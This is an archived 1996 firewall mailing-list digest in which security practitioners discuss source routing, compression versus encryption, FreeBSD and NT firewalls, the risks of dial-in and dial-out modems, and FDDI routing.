paper on > weaknesses in the TCP/IP protocol. > - Microsoft's tracert module purportedly has an option to use > loose source-routing to debug network problems (this is their > version of traceroute). 
> - Some networks configure their routers to reject source-routed packets. > - Firewalls should reject source-routed packets. >What I am curious about is what functions or applications, if any, commonly use source-routing. I haven't noticed any Telnet clients that, for example, could specify a loose source-routing to contact a particular host. I have searched the Comer series on Internetworking with TCP/IP and other references, but see little information on actual usage. > >Ray Hooker, rayhook@ibm.net >Secure I/T Inc. >1-919-544-4565 > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Tue Jan 2 11:07:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28566 for firewalls-outgoing; Tue, 2 Jan 1996 11:03:42 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28554 for ; Tue, 2 Jan 1996 11:03:38 -0800 (PST) Date: Tue, 2 Jan 1996 14:02:49 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com CC: bvvanor@rssi.rssi.com Message-Id: <960102140249.202006bf@hobbes.orl.mmc.com> Subject: Compression is useful - but for security, not Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Being concerned about security, I did not want to present them a plan that >did not also include some security considerations. Some of the Government >people came up with the idea of using a compression box to reduce the number >of required T1s. The box they recommended has V.35 ports, and would sit >between the Cisco and the CSU/DSU. To be fair, the vendor told me his >box did not do encryption, but since the data was compressed, it would not >be in plain view. 1) Compression aids performance. It does not aid security (at best is SBO). 
2) Sounds like you have dedicated lines. Have you considered requiring PNS (Protected Network Service) from the telco ? (May have a different name but should be available). With this your lines are isolated/protected from other trunks. A dedicated line is not at the same risk as the Internet and PNS is generally "good enough" for SBU (Sensitive but Unclassified) traffic. When the idea was introduced a couple of years ago, it was to be approved by the NSA and was a part of the FTS contract. Dunno where it is now. Warmly, Padgett From firewalls-owner Tue Jan 2 11:22:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28971 for firewalls-outgoing; Tue, 2 Jan 1996 11:16:01 -0800 (PST) Received: from magellan.cleveland.dfas.mil (magellan.cleveland.dfas.mil [164.216.50.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28966 for ; Tue, 2 Jan 1996 11:15:54 -0800 (PST) Received: from mail.cleveland.dfas.mil (mail.cleveland.dfas.mil [164.216.11.5]) by magellan.cleveland.dfas.mil (8.6.12/8.6.12) with SMTP id OAA09745 for ; Tue, 2 Jan 1996 14:11:28 -0500 Received: from cc:Mail by mail.cleveland.dfas.mil id AA820620752; Tue, 02 Jan 96 14:13:09 EST Date: Tue, 02 Jan 96 14:13:09 EST From: "KOHLS, KERSTEN" Message-Id: <9600028206.AA820620752@mail.cleveland.dfas.mil> To: firewalls@greatcircle.com Subject: FreeBSD as a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings -- Does anyone use FreeBSD as a firewall and can you tell me what problems you've had with it? We're evaluating solutions and this is one of the possibilities . . . 
TIA -- Kersten Kohls kkohls@cleveland.dfas.mil From firewalls-owner Tue Jan 2 11:40:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA29132 for firewalls-outgoing; Tue, 2 Jan 1996 11:26:22 -0800 (PST) Received: from delta.eecs.nwu.edu (delta.eecs.nwu.edu [129.105.5.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA29127 for ; Tue, 2 Jan 1996 11:26:17 -0800 (PST) Received: by delta.eecs.nwu.edu (8.6.12/8.6.12) id NAA22342; Tue, 2 Jan 1996 13:22:43 -0600 Date: Tue, 2 Jan 1996 13:22:43 -0600 From: Robert Bonomi Message-Id: <199601021922.NAA22342@delta.eecs.nwu.edu> To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com, firewalls@GreatCircle.COM Subject: Re: Firewalls needed for both dial-in AND dial-out Sender: firewalls-owner@GreatCircle.COM Precedence: bulk + Date: Tue, 02 Jan 1996 06:50:35 -0600 + Subject: Firewalls needed for both dial-in AND dial-out + To: firewalls@GreatCircle.COM, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com + Sender: firewalls-owner@GreatCircle.COM + + I'm putting together a document listing the risks of not only allowing + dial-in access to a networked PC (used for accessing computer systems + on a corporate WAN/LAN at least some of the time...typically has a network + interface card); but also the risks of allowing dial-out access from a + networked PC. I'd appreciate your help, wisdom, and knowledge in critiquing + the following regarding the dial-out issues. I apologize if there is a FAQ + on this somewhere...I currently do not have very convenient access to the + Internet except via e-mail. If you could provide the location of such a FAQ, + that'd be great! + + First, here are some givens: + * I know any type of remote access is NOT risk-free...that acceptable risks + must be determined to allow efficient and effective use of remote access + (please no long philisophical discussions of how we can never remove all + risks from remote access). 
+ * I know policies need to be established for end-users to follow to help
+ ensure remote access security. (This document will be used to establish
+ buy-in for the policies and educate end-users why the policies are
+ necessary.)
+ * The environment: Large nation-wide WAN composed of several hundred LANs
+ and running virtually every type of operating system imaginable. 18,000+
+ users.
+ * With so many users, it's unlikely that all (or even a large percentage) of
+ them will set up the dial-out access to be STRICTLY dial-out, will keep the
+ modem shut off when not in use (if their modem set-up even allows this), or
+ will know AND UNDERSTAND the risks involved when connecting using TCP/IP.
+ * Users may need to dial-out to not only the Internet, but also to a vendor
+ or customer, to a BBS, or to services such as Lexus/Nexus, CompuServ, AOL,
+ etc.
+ * Dial-in access to networked PCs is being controlled through firewalls.
+ (Would like to see dial-out occur through firewalls also.)

Analyzing 'dial-in' risks is fairly simple/straightforward.
1) authentication
2) authorization
3) access-control

'layered defenses' are a _good_ idea. the more you can restrict the functionality available to _any_ dial-in user, the more limited the potential risk posed by unauthorized access. strong authentication helps ensure that *only* authorized persons gain access.

+
+ So, what are the risks involved with various dial-out methods?
+ * Networked PC with modem using SLIP/PPP
+ - Provides bi-directional access
+ - Unauthorized folks (let's call them intruders!)
+ can enter the WAN during
+ the employee's dial-out session
+ - Once the intruder enters the WAN he/she can wander around the systems
+ trying to find weaknesses and other entry points
+ - Files can be transferred to the dial-out employee's hard-drive
+ - Files on the dial-out employee's hard-drive may also be copied, deleted,
+ and possibly modified
+ - Files may also be copied to, deleted, or modified on the other WAN
+ systems
+ - Viruses and/or trojan horses may be placed on the dial-out employee's
+ hard drive, or on one of the systems on the WAN
+ - Changes may be made to WAN systems which could prevent access to the WAN
+ by legitimate WAN users

all true. it *is* a 'network' connection. vulnerable to *any* attack that can be launched over a network connection. IP spoofing, session hijacking, etc. requires _at_least_ as 'good' a firewall as you would use on a hard-wired connection. the *only* difference is that it is a 'part-time' connection, but relying on this is, in effect, security through obscurity.

+
+ * Networked PC using communications software (eg., SmallTalk) with no TCP/IP
+ - Less risks than PPP/SLIP because of the configurability of the
+ communications software to allow only dial-out (IF the employee
+ remembers to configure the software this way)
+ - What would the risks be here???

*no* vulnerability to _outside_only_ attack. Especially if the phone line does not accept incoming calls. Entire risk is via compromise due to 'inside' user mistakes -- e.g. virus infection from 'downloaded' executable.

+
+ * Networked PC using a dial-out modem bank (no modem attached to the PC)
+ - More secure because of centralized control
+ - What would the risks be here???

functionally, little if any different than modem on the PC. less chance of user 'inadvertently' leaving a 'dial-in' server running. However, if line is restricted from incoming calls, point is moot.
+
+ * Stand-alone (never networked) PC using SLIP/PPP
+ - Viruses and trojans can be placed on the dial-out employee's hard drive
+ - Any files copied to diskettes and placed on the network could cause
+ problems
+ - Employee's PC could be used as a repository

That machine is vulnerable to any/all network-based attacks. It protects the -rest- of the internal network against all but _very_determined_ attacks. *Possible vector* of infection to internal network, via floppy-transferred files.

+
+ * Stand-alone PC using communications software and no TCP/IP
+ - Again, less risks because of the communications software
+ - What would the risks be here???

Pretty much the same as a 'terminal-emulating' _networked_ PC. you buy an additional layer of containment, but if the user is 'foolish' enough to download an 'unknown' executable, he's also 'foolish' enough to move it to the networked machines intact. And you get infected, anyway.

+
+ Please comment on items I have listed that you believe are NOT risks. Also,
+ please let me know the risks for each type of dial-out PC that I did not have
+ listed. Do you know of other dial-out methods I did not list? If so, what
+ are they, and what are the associated risks?
+
+ Thanks in advance for your help!!
+
+ Becky
+ herold.becky@mhs-pfg1.attmail.com
+
+ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ The opinions expressed here are strictly my own and do not necessarily
+ represent those of my employer.
+ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+

From firewalls-owner Tue Jan 2 12:52:21 1996
Message-Id: <199601022047.MAA25036@lint.cisco.com>
Date: Tue, 02 Jan 1996 15:48:15 -0500
To: firewalls@GreatCircle.com
From: Paul Ferguson
Subject: ISS ported to NT

From the 'For What It's Worth' department -

The January 1, 1996 edition of Communications Week has an article [Internet Scanner Ported to Win NT, by Karen Rodriguez, p. 24] explaining that Internet Security Systems, Inc. has announced plans to ship a version of its Internet Scanner software for systems running Windows NT.

- paul

--
Paul Ferguson
Consulting Engineering
Reston, Virginia USA
tel: +1.703.716.9538
e-mail: pferguso@cisco.com
cisco Systems

From firewalls-owner Tue Jan 2 14:23:16 1996
From: Chris Kostick
Message-Id: <199601022218.RAA00396@mccoy.ashton.csc.com>
Subject: firewall encryption information
To: firewalls@greatcircle.com
Date: Tue, 2 Jan 1996 17:18:37 -0500 (EST)

A few questions about firewalls setting up virtual private networks.

- for Gauntlet; what is the encryption algorithm used and what is the key size for session keys?
- for Eagle; what is the key size used for DES encryption?
- for Firewall-1; what is the key size used for DES encryption?
--
chris

From firewalls-owner Tue Jan 2 14:37:21 1996
Date: Mon, 1 Jan 1996 02:27:52 -0500 (EST)
From: Rabid Wombat
To: Pablo
cc: firewalls@GreatCircle.COM
Subject: Re: ipx-bridging & ip-routing

below:

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------

On Tue, 2 Jan 1996, Pablo wrote:

>
> Hi all,
> I am working on a problem in which I need some sort of unix box (
> linux/bsd ? ) to do ip-routing ( no problem there, i know ), & do
> ipx-bridging. The second part is the problem area. Coming into & going
> out of the box will be 100 mbps FDDI. I have set up a linux box and put
> ipfwadmin & ipxbridge & ipxripd ( mostly from sunsite ) on it, and it
> seems like it will work ok for ipx bridging, but it seems like it will be
> far too inefficient to handle traffic from 300+ users @ 100mbps.
> vinod@cse.iitb.ernet.in says in the documentation on ipx-bridge
> that he is currently using ipx-bridge to connect two networks, i'm not
> sure how large the networks are. I was hoping someone out there would
> have some comments or ideas on what to use to ROUTE ip packets with good
> control, and bridge ipx-packets as fast as possible. I can use a
> dedicated box for the routing, or even one of the cisco products if need
> be, I just need to know the best way to go. Any insight would be greatly
> appreciated.
My guess is that the PC bus will be the bottleneck. I've run PC servers on FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than about 25 Mb/s stuffed into the box. I haven't looked into this lately; PCI may have a higher raw capacity. If you are expecting to be using the FDDI to capacity you may be outa luck using a PC.

Hope this is of some use. I'd be glad to hear from someone who's done this successfully.

>
> Thanks in advance!
>
> paul
>

From firewalls-owner Tue Jan 2 15:37:21 1996
Date: Tue, 02 Jan 1996 17:21:56 -0600
From: Steve Devore
To: kkohls@cleveland.dfas.mil, firewalls@greatcircle.com
Subject: FreeBSD as a firewall -Reply

I have used it and have not had any problems with it. I have set up a couple of systems where I used the fwtk toolkit, socks, and some other stuff. It was not difficult to set up. However, I wouldn't consider it unless you have considerable unix experience (as with anything that is not supported).

>>> KOHLS, KERSTEN 1/2/96, 01:13pm >>>
Greetings --

Does anyone use FreeBSD as a firewall and can you tell me what problems you've had with it? We're evaluating solutions and this is one of the possibilities . . .
TIA --
Kersten Kohls
kkohls@cleveland.dfas.mil

From firewalls-owner Tue Jan 2 16:37:22 1996
Date: Wed, 3 Jan 1996 09:25:24 +0900
From: wyyou@kangtong (You Woo Yeol)
Message-Id: <9601030025.AA07697@kangtong.>
Apparently-To: Firewalls@GreatCircle.COM

Please stop sending e-mail. I'm no longer interested.

Thank you
WooYeol You

From firewalls-owner Tue Jan 2 16:52:20 1996
From: Julian Assange
Message-Id: <199601030034.LAA17736@suburbia.net>
Subject: Re: Compression is useful - but for security, not
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Wed, 3 Jan 1996 11:34:10 +1100 (EST)
Cc: firewalls@greatcircle.com, bvvanor@rssi.rssi.com
In-Reply-To: <960102140249.202006bf@hobbes.orl.mmc.com> from "A. Padgett Peterson, P.E.
Information Security" at Jan 2, 96 02:02:49 pm

> 1) Compression aids performance. It does not aid security (at best is SBO).

Not so! Compressed plain text, which is then ciphered, is several orders of magnitude harder to break (depending on the compression scheme and attack).

--
Julian Assange
FAX: +61-3-9819-9066
EMAIL: proff@suburbia.net
"if you think the United States has stood still, who built the largest shopping centre in the world?" - Nixon

From firewalls-owner Tue Jan 2 17:37:21 1996
Message-Id: <199601030126.RAA27726@m1.interserv.com>
Date: Wed, 3 Jan 1996 09:25:24 +0900
From: kangtong!wyyou@uunet.uu.net (You Woo Yeol)
Apparently-To: Firewalls@GreatCircle.COM
From: Interserv Operations
Subject: Mailbox soft limit exceeded
To: mevans01@interserv.com

Your mailbox has exceeded the soft size limit of 8MB. Mail will continue to be delivered to your mailbox until it reaches the hard size limit of 15MB. Please remove unnecessary messages from your mailbox.

Additionally, if you're using CompuServe/Spry AirMail you may choose the local inbox option which will download the mail from your remote inbox to your local system inbox before allowing you to read it.

PLEASE NOTE: Use of the local inbox option will preclude accessing the downloaded mail messages except from the system on which the messages were downloaded.

--
Interserv Network Operations Center
Postmaster@interserv.com
noc@interserv.net
2001 6th Ave. Suite 3025B
Seattle, WA.
95121
CompuServe/Internet Division

From firewalls-owner Tue Jan 2 19:52:21 1996
From: Chris Kostick
Message-Id: <199601030358.WAA00783@mccoy.ashton.csc.com>
Subject: encrypting modems
To: firewalls@greatcircle.com
Date: Tue, 2 Jan 1996 22:58:55 -0500 (EST)

Can anyone provide me a list of vendors who make encrypting modems? That is, a modem with encryption in hardware rather than software on a machine just sending out over a modem.
--
chris

From firewalls-owner Tue Jan 2 20:22:22 1996
Date: Tue, 2 Jan 1996 23:02:36 -0500 (EST)
From: Rabid Wombat
To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com
cc: firewalls@GreatCircle.COM, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com
Subject: Re: Firewalls needed for both dial-in AND dial-out

below:

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------

On Tue, 2 Jan 1996 /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com wrote:

> I'm putting together a document listing the risks of not only allowing
> dial-in access to a networked PC (used for accessing computer systems
> on a corporate WAN/LAN at least some of the time...typically has a network
> interface card); but also the risks of allowing dial-out access from a
> networked PC. I'd appreciate your help, wisdom, and knowledge in critiquing
> the following regarding the dial-out issues. I apologize if there is a FAQ
> on this somewhere...I currently do not have very convenient access to the
> Internet except via e-mail. If you could provide the location of such a FAQ,
> that'd be great!
>
> First, here are some givens:
> * I know any type of remote access is NOT risk-free...that acceptable risks
> must be determined to allow efficient and effective use of remote access
> (please no long philosophical discussions of how we can never remove all
> risks from remote access).
The basic approach is to determine what your assets are, who/what the threats are, and the likelihood of each type of attempt. You can then identify possible solutions, and determine what is cost effective, and make a guess as to how secure you are/aren't. I've seen this summarized as Asset Valuation, Threat Modeling, Assessment of Vulnerability, Countermeasure Evaluation, and Risk Assessment.

> * I know policies need to be established for end-users to follow to help
> ensure remote access security. (This document will be used to establish
> buy-in for the policies and educate end-users why the policies are
> necessary.)

It's a good idea to formalize a security policy, and make it known to users, as you are doing. You may want to go a step further, by requiring users to sign a usage policy, although this may depend on your corporate culture. Also, an exit briefing should inform users that their obligations to the organization don't end when they terminate their employment.

> * The environment: Large nation-wide WAN composed of several hundred LANs
> and running virtually every type of operating system imaginable. 18,000+
> users.
> * With so many users, it's unlikely that all (or even a large percentage) of
> them will set up the dial-out access to be STRICTLY dial-out, will keep the
> modem shut off when not in use (if their modem set-up even allows this), or
> will know AND UNDERSTAND the risks involved when connecting using TCP/IP.
> * Users may need to dial-out to not only the Internet, but also to a vendor
> or customer, to a BBS, or to services such as Lexus/Nexus, CompuServ, AOL,
> etc.
> * Dial-in access to networked PCs is being controlled through firewalls.
> (Would like to see dial-out occur through firewalls also.)
>
> So, what are the risks involved with various dial-out methods?
> * Networked PC with modem using SLIP/PPP
> - Provides bi-directional access
> - Unauthorized folks (let's call them intruders!)
> can enter the WAN during
> the employee's dial-out session
> - Once the intruder enters the WAN he/she can wander around the systems
> trying to find weaknesses and other entry points
> - Files can be transferred to the dial-out employee's hard-drive
> - Files on the dial-out employee's hard-drive may also be copied, deleted,
> and possibly modified
> - Files may also be copied to, deleted, or modified on the other WAN
> systems
> - Viruses and/or trojan horses may be placed on the dial-out employee's
> hard drive, or on one of the systems on the WAN
> - Changes may be made to WAN systems which could prevent access to the WAN
> by legitimate WAN users

The (potentially) worst breach I've run into was at a site belonging to one of our NATO allies; an end-user wanted to FTP files from a U.S. site, and didn't know how to request access through the firewall. He installed Netmanage, and enabled the IP Routing feature - opened the whole network up. Fortunately, monitoring caught this immediately, and we were finally able to get all the modems out of end-users' hands as a result.

>
> * Networked PC using communications software (eg., SmallTalk) with no TCP/IP
> - Less risks than PPP/SLIP because of the configurability of the
> communications software to allow only dial-out (IF the employee
> remembers to configure the software this way)
> - What would the risks be here???
>

With 18,000+ users, I'd expect a wide variety of user-installed communication software to start showing up, both purchased and bootlegged. Many popular packages support host mode, and I've run into quite a few users who will take the time to figure out how to use this the first time they run into a file too big to take home on a floppy. Even worse are the remote control packages, such as PC Anywhere. They're great for telecommuting, but are a security nightmare, especially if the end-user installs and configures.
In terms of risks, a fair number of security breaches involve current employees with legitimate system access. The most common threats involving dial-out systems are non-work/recreational usage, bootlegging of software (both acquiring and distributing), and exporting corporate data (for sale, or to benefit a future employer). Launching attacks on other (outside) systems is also a problem.

> * Networked PC using a dial-out modem bank (no modem attached to the PC)
> - More secure because of centralized control
> - What would the risks be here???
>

A better solution than giving modems to users. Even the possibility that someone is watching/monitoring is of some value. What are your applications? Could users TELNET to a UNIX system, and then dial out from there? You could then go as far as using single-use (couponing) passwords, and monitor sessions. You're still at risk to internal monitoring; a sniffer attack could be used to obtain passwords to external systems. Denial of use attacks could be launched against the comm server, and session hijacking could be employed. These require more sophistication than other attacks, and require access to the local segment.

> * Stand-alone (never networked) PC using SLIP/PPP
> - Viruses and trojans can be placed on the dial-out employee's hard drive
> - Any files copied to diskettes and placed on the network could cause
> problems
> - Employee's PC could be used as a repository
>
> * Stand-alone PC using communications software and no TCP/IP
> - Again, less risks because of the communications software
> - What would the risks be here???
>
> Please comment on items I have listed that you believe are NOT risks. Also,
> please let me know the risks for each type of dial-out PC that I did not have
> listed. Do you know of other dial-out methods I did not list? If so, what
> are they, and what are the associated risks?
>
> Thanks in advance for your help!!

Hope this is of some use.
I'm working on similar projects, and would be happy to trade ideas.

>
> Becky
> herold.becky@mhs-pfg1.attmail.com
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> The opinions expressed here are strictly my own and do not necessarily
> represent those of my employer.
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>

From firewalls-owner Tue Jan 2 20:37:22 1996
Date: Tue, 2 Jan 1996 23:26:00 -0500 (EST)
From: Rabid Wombat
To: firewalls@greatcircle.com
Subject: rfi Radius

Is anyone out there using Radius w/ Portmasters? I'd be interested in getting informed opinions, as I'm considering implementing it. Since it uses encrypted sessions, can the system serving as a firewall also serve as the Radius host, or is this opening a hole?
----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------

From firewalls-owner Wed Jan 3 03:07:21 1996
Date: Wed, 3 Jan 1996 21:00:17 +1000 (EST)
From: Shaw Innes
To: Rabid Wombat
cc: Pablo, firewalls@GreatCircle.COM
Subject: Re: ipx-bridging & ip-routing

On Mon, 1 Jan 1996, Rabid Wombat wrote:

> My guess is that the PC bus will be the bottleneck. I've run PC servers on
> FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than
> about 25 Mb/s stuffed into the box. I haven't looked into this lately;
> PCI may have a higher raw capacity. If you are expecting to be using the
> FDDI to capacity you may be outa luck using a PC.
>
> Hope this is of some use. I'd be glad to hear from someone who's done
> this successfully.

I don't really know an awful lot about FDDI, but I could see that a PC would cause a bottleneck at 100mb/s also. However, I have noticed that there exists Linux for MIPS, SPARC and Alpha architectures. Hence if the PC was causing a bottleneck, surely you could buy a Sun and run Linux on the Sun, using the Sun's faster bus to route/bridge the packets?

Perhaps not...
this is just a theory

Regards,
Shaw

--
Shaw Innes
IRC: McLeod  Mobile: 019-470-556
WWW: http://www.odyssey.com.au/mcleod
mcleod@cynergy.com.au | mcleod@healey.com.au | mcleod@odyssey.com.au
"If I were to wish for anything, I should not wish for wealth and power, but for the eye which, ever young and ardent, sees the possible"

From firewalls-owner Wed Jan 3 03:37:24 1996
Message-Id: <199601031128.DAA24987@miles.greatcircle.com>
Date: Wed, 03 Jan 1996 12:27:05 +0100
To: firewalls@greatcircle.com
From: Hans Lissborg
Subject: Firewall for Windows NT?

Does anyone know of a free (or cheap) firewall for Windows NT?
Thanks
Hans

From firewalls-owner Wed Jan 3 04:22:22 1996
Message-Id: <199601031205.EAA07234@lint.cisco.com>
Date: Wed, 03 Jan 1996 07:06:10 -0500
To: Shaw Innes
From: Paul Ferguson
Subject: Re: ipx-bridging & ip-routing
Cc: Rabid Wombat, Pablo, firewalls@GreatCircle.COM

Is there some reason why a router is not being considered? It would appear to be a natural choice...

- paul

At 09:00 PM 1/3/96 +1000, Shaw Innes wrote:
>On Mon, 1 Jan 1996, Rabid Wombat wrote:
>
>> My guess is that the PC bus will be the bottleneck. I've run PC servers on
>> FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than
>> about 25 Mb/s stuffed into the box. I haven't looked into this lately;
>> PCI may have a higher raw capacity. If you are expecting to be using the
>> FDDI to capacity you may be outa luck using a PC.
>>
>> Hope this is of some use. I'd be glad to hear from someone who's done
>> this successfully.
>
>I don't really know an awful lot about FDDI, but I could see that a PC
>would cause a bottleneck at 100mb/s also. However, I have noticed that
>there exists Linux for MIPS, SPARC and Alpha architectures. Hence if
>the PC was causing a bottleneck, surely you could buy a Sun and run Linux
>on the Sun, using the Sun's faster bus to route/bridge the packets?
>
>Perhaps not...
this is just a theory > >Regards, > Shaw > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 3 05:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA28385 for firewalls-outgoing; Wed, 3 Jan 1996 05:23:43 -0800 (PST) Received: from netcomsv.netcom.com (uucp3.netcom.com [163.179.3.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA28380 for ; Wed, 3 Jan 1996 05:23:39 -0800 (PST) From: kurt@hteinc.com Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id FAA08677; Wed, 3 Jan 1996 05:13:23 -0800 Received: from rs01.hteinc.com by rs02.hteinc.com (8.6.12/1.7) id HAA14114; Wed, 3 Jan 1996 07:31:08 -0500 Received: from ws11.hteinc.com (ws11.hteinc.com [172.24.0.30]) by rs01.hteinc.com (8.6.12/1.1) with SMTP id HAA67450 for ; Wed, 3 Jan 1996 07:31:07 -0500 Date: Wed, 3 Jan 96 07:21:17 PST Subject: Public traffic over private network To: firewalls@greatcircle.com X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have a client who has told us about their upcoming internet access. The setup they are proposing, in my opinion, is a security risk. They have a corporate WAN with 15 segments/routers connected to a FDDI backbone. They are getting two Class C addresses. One for the WWW, FTP, etc. segment that will be connected directly to the Internet and a second class C that will be for other public services. The problem is the second class C will be on the other side of the FDDI ring. Therefore public traffic will have to pass over the FDDI to get to the second class C. But at the same time everyone in the organization will have access out to the net.
They don't have a security policy other than don't let the bad guys mess up any stuff. Now I know that the routers can be programmed to an extent to disallow certain access. But it seems to me that allowing public traffic on the private network is asking (advertising) for a break in. If anyone has any comments on this setup, please comment. Kurt Kessel HTE, Inc. kurt@hteinc.com 407-841-3235 (v) 407-246-8835 (fax) From firewalls-owner Wed Jan 3 06:22:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA29947 for firewalls-outgoing; Wed, 3 Jan 1996 06:19:00 -0800 (PST) Received: from godel2.bim.be (godel2.bim.be [141.253.4.135]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA29942 for ; Wed, 3 Jan 1996 06:18:54 -0800 (PST) From: pc@bim.be Received: from gauss.bim.be by godel2.bim.be (5.x/SMI-SVR4) id AA01060; Wed, 3 Jan 1996 14:17:25 +0100 Date: Wed, 3 Jan 1996 14:17:25 +0100 Message-Id: <9601031317.AA01060@godel2.bim.be> To: hans@lpa.se Subject: Re: Firewall for Windows NT? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A firewall called "catapult" is announced by Microsoft. I don't know when it will be available. Philippe -- Ph. Cayphas Senior Engineer E-Mail: pc@bim.be Telephone: +32(10)47.08.32 Fax : +32(10)47.08.11 Postal Mail : Ph. Cayphas BIM sa 4, Av.
Albert Einstein 1348 Louvain-La-Neuve Belgium From firewalls-owner Wed Jan 3 06:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA00184 for firewalls-outgoing; Wed, 3 Jan 1996 06:35:05 -0800 (PST) Received: from logicon.com (klee.logicon.com [137.51.252.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA00179 for ; Wed, 3 Jan 1996 06:35:02 -0800 (PST) Received: from cclink.logicon.com (cclink-out.logicon.com) by logicon.com (5.0/SMI-4.2) id AA17280; Wed, 3 Jan 96 06:50:16 PST Received: from cc:Mail by cclink.logicon.com id AA820680065; Wed, 03 Jan 96 08:59:10 PST Date: Wed, 03 Jan 96 08:59:10 PST From: "Grady, Pat" Message-Id: <9600038206.AA820680065@cclink.logicon.com> To: pablo@smartlink.net, Rabid Wombat Cc: firewalls@GreatCircle.COM Subject: Re[2]: ipx-bridging & ip-routing Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually, 25 Mbps on 100Mbps FDDI is pretty good--the bottleneck is usually the overhead and handshakes of the network protocol. ______________________________ Reply Separator _________________________________ Subject: Re: ipx-bridging & ip-routing Author: Rabid Wombat at INTERNET-MAIL Date: 1/2/96 5:45 PM My guess is that the PC bus will be the bottleneck. I've ran PC servers on FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than about 25 Mb/s stuffed into the box. I haven't looked into this lately; PCI may have a higher raw capacity. If you are expecting to be using the FDDI to capacity you may be outa luck using a PC. Hope this is of some use. I'd be glad to hear from someone who's done this successfully. > > Thanks in advance! 
> > paul > > > From firewalls-owner Wed Jan 3 06:52:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA00304 for firewalls-outgoing; Wed, 3 Jan 1996 06:46:08 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA00299 for ; Wed, 3 Jan 1996 06:46:04 -0800 (PST) Date: Wed, 3 Jan 1996 9:45:24 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: proff@suburbia.net CC: firewalls@greatcircle.com Message-Id: <960103094524.2020153c@hobbes.orl.mmc.com> Subject: RE: Compression is useful - but for security, not Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I rote >> 1) Compression aids performance. It does not aid security (at best is SBO). Julian wresponded: >Not so! Compressed plain text, which is then ciphered is several orders >of magnitude harder to break (depending on the compression scheme and attack). Any cipher scheme that is effectively strengthened by compression is not very good encryption IMNSHO. True, if you use a rearranged XXENCODE table as your cipher scheme, compression will make it more difficult to break (provided you remove the headers). Triple DES or SKIPJACK is hard enough to break that compression makes no effective difference.
